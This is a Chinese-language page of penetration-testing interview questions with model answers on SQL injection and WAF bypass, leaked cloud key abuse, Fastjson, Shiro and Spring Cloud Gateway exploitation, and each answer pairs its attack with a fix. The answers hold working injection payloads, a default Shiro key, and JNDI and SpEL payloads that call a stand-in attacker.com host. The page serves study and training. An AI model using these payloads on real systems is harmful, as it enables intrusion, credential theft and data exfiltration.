绿盟面试题

《网安面试指南》https://mp.weixin.qq.com/s/RIVYDmxI9g_TgGrpbdDKtA?token=1860256701&lang=zh_CN

5000篇网安资料库https://mp.weixin.qq.com/s?__biz=MzkwNjY1Mzc0Nw==&mid=2247486065&idx=2&sn=b30ade8200e842743339d428f414475e&chksm=c0e4732df793fa3bf39a6eab17cc0ed0fca5f0e4c979ce64bd112762def9ee7cf0112a7e76af&scene=21#wechat_redirect

1. SQL注入进阶利用

题目 :某登录系统存在SQL注入漏洞,但过滤了'"空格union关键字,如何绕过并获取管理员密码?
答案

  • 绕过引号:使用十六进制编码(0x61646D696E代替'admin')或宽字节注入(%bf%27);
  • 绕过空格:用/**/%0a代替;
  • 绕过union:使用盲注(布尔/时间盲注)或报错注入(extractvalue(1,concat(0x7e,(select user()))));
  • 利用示例:admin'^extractvalue(1,concat(0x7e,(select substr(password,1,20) from users where username=0x61646D696E)))%23
    修复方案:预编译(PreparedStatement)+ 白名单过滤。

2. AK/SK泄露的云环境渗透

题目 :在GitHub公开代码中发现某云厂商的AK/SK,如何快速验证并扩大攻击面?
答案

  1. 验证AK/SK有效性:使用AWS CLI执行aws sts get-caller-identity(或对应云厂商SDK);
  2. 权限枚举:列出IAM权限边界、S3存储桶、EC2实例等;
  3. 横向移动:创建后门用户、生成临时凭证、部署恶意Lambda函数;
  4. 数据泄露:下载敏感存储桶数据或数据库快照。
    修复方案:使用环境变量存储密钥、启用密钥轮换、限制IAM权限范围。

3. Fastjson反序列化漏洞

题目 :如何利用Fastjson ≤1.2.24的反序列化漏洞实现RCE?给出利用链及限制条件。
答案

  • 利用链JdbcRowSetImpl + JNDI注入(需出网);

  • Payload

    {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://attacker.com/Exploit","autoCommit":true}

  • 限制条件 :目标需开启autoType功能(默认关闭);

  • 修复方案 :升级至1.2.83+,关闭autoType,使用安全模式。

4. Java代码审计:危险方法调用

题目:审计以下代码,指出漏洞并说明利用方式:

复制代码
String cmd = request.getParameter("cmd");
Runtime.getRuntime().exec(cmd);

答案

  • 漏洞 :未过滤直接执行用户输入的cmd参数,导致命令注入;
  • 绕过技巧 :使用;&|$(subshell)分割命令;
  • 修复方案 :使用白名单校验或ProcessBuilder参数化调用。

5. Shiro反序列化漏洞

题目 :如何利用Shiro的RememberMe功能实现反序列化攻击?给出关键步骤。
答案

  1. 获取Cookie中的rememberMe字段(Base64+AES-CBC加密);
  2. 利用已知Key(默认Key如kPH+bIxk5D2deZiIxcaaaA==)或爆破Key;
  3. 构造恶意序列化数据(如CommonsCollections链),加密后替换Cookie;
  4. 触发反序列化实现RCE。
    修复方案:更换Shiro Key,升级至1.7.0+,禁用危险链。

6. 框架漏洞:Spring Cloud Gateway RCE

题目 :简述CVE-2022-22947的利用条件及攻击步骤。
答案

  • 漏洞成因 :未校验路由配置的Filter参数,导致SpEL表达式注入;
  • 利用步骤
    1. 添加恶意路由:POST /actuator/gateway/routes/test,Body包含SpEL表达式(如T(java.lang.Runtime).getRuntime().exec("curl attacker.com"));
    2. 刷新路由:POST /actuator/gateway/refresh
    3. 访问路由触发RCE。
      修复方案:升级Spring Cloud Gateway至3.1.1+,禁用Actuator接口。

7. SQL注入绕过WAF

题目 :某WAF拦截了UNION SELECTinformation_schema,如何获取数据库名?
答案

  • 替代information_schema:使用sys.schema_auto_increment_columns(MySQL 5.6+);

  • 绕过UNION:利用报错注入或布尔盲注;

  • Payload示例:

    ' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),0x7e,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) --+

修复方案:使用ORM框架+参数化查询,禁用错误回显。

相关推荐
用户962377954482 天前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机2 天前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机2 天前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954482 天前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star2 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954482 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher4 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行7 天前
网络安全总结
安全·web安全
red1giant_star7 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全
ZeroNews内网穿透7 天前
谷歌封杀OpenClaw背后:本地部署或是出路
运维·服务器·数据库·安全